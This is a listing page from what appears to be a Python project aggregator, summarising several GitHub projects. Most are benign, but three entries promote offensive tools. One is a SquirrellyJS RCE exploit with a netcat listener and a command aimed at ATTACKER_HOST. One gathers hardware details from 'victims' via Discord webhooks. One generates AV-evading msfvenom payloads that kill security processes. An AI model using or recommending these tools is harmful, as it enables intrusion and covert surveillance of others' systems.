SquirrellyJS mixes pure template data with engine configuration options through the Express render API

CVE-2021-32819 CVE-2021-32819 : SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications. Source https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/ Analysis https://blog.diefunction.io/vulnerabilities/ghsl-2021-023 squirrelly v8.0.0 >= v8.0.8 Remote Code Execution Environment Ubuntu 20.04.1 Example nc -lvp 443 python3 exploit.py http://example.com/ ATTACKER_HOST 443 GitHub https://github.com/Abady0x1/CVE-2021-32819    

Read more

Exploratory data analysis and build powerful data and viz tools using Python

Panel-Chemistry The purpose of the panel-chemistry project is to make it really easy for you to do exploratory data analysis and build powerful data and viz tools within the domain of Chemistry using Python and HoloViz Panel. Check out the panel-chemistry examples on Binder Jupyter Notebook Jupyter Labs Panel Apps 🏁 Background This project is just starting (2021-05-19) and not much more than an idea. It was started by the discussion How to display JSME molecular editor with Panel? in […]

Read more

A project tried to get information about the hardware of your victims

WebhookHardware git clone https://github.com/Br3Fuck/WebhookHardware/ cd WebhookHardware / And configure the file! pip install requests || pip3 install requests pip install discord_webhook || pip3 install discord_webhook pip install discord || pip3 install discord pip install threading || pip3 install threading pip install uuid || pip3 install uuid pip install psutil || pip3 install psutil GitHub https://github.com/Br3Fuck/WebhookHardware    

Read more

Quiz game made entirely with python and pygame for school work

Pygame-Quiz Quiz game made entirely with python and pygame for school work. Quiz made entirely with pygame for schoolwork How to install If you already have python and pygame installed on your computer: Download the ‘images’ folder Download the ‘game.py’ file Run the ‘game.py’ file Note: the ‘game.py’ file and the ‘images’ folder must be together in the same location/folder on your computer If you don’t have python and pygame installed (beginners): Download the ‘alternative quiz’ folder Run game.exe game […]

Read more

A Python Scraper for Downloading Instagram Profile’s Posts,stories and ProfilePic

InstAstra A Python Instagram Scraper for Downloading Profile’s Posts, stories, ProfilePic and See the Details of Particular Instagram Profile. InstAstra is the an Instagram Scraper tool which lets you get Information about any Instagram Profile. This tool also let’s you Download the profile DP, all saved Stories, all posts of any instagram account. ⩥ Instaloader python module is used to make the project Work! Developed by : Jeevan-Gharate Module Used : Instaloader To Use the Tool simply Download the zip […]

Read more

Collects all accepted codes submitted within the given timeframe of any contest

Collects all accepted (partial and full scored) codes submitted within the given timeframe of any contest. And saves them locally with a file name . for plagiarism check. Demo: Installation: In Terminal: Run pip install selenium Run pip install pyperclip Downloads: Procedure: Type chrome://version in Chrome Search Bar according to your chrome version and Operating System Download ChromeDriver zip file Unzip (extract) the file to your preferred location Copy the path Changes: Copy the Path of chromedriver.exe (Example: C:UsersuserDownloads) add […]

Read more

Tool To generate Stable Undetected Payload

windowsPayload Tool To generate Stable Undetected Payload git clone https://github.com/youhacker55/PayGen/ cd PayGen python3 generate.py if you are On linux Install Py on Wine and Compile using pyinstaller (I recommend to Use Windows For Compiling) Features [x] Create Payload With MsfVenom Automated [x] Creates a handler.rc file [x] Undetectable [x] Stop Sec Services And Kill Av Process [x] AutoPortForwarding(Ngrok) [x] Obfuscate Payload Video ## GitHub https://github.com/youhacker55/PayGen    

Read more

Search wikipedia article on command line with python

Fetch Search wikipedia article on command line Fetch is use to get information about anything on the shell using Wikipedia. Why this? Fetch helps you to quickly look about anything and it is all possible with wikipidea webscrapping you can get full wikipedia article on the topic or you can also look at the introduction about the topic. Yes you can look about anything on your terminal no need of browser it makes your life easy. You can also search […]

Read more
1 586 587 588 589 590 912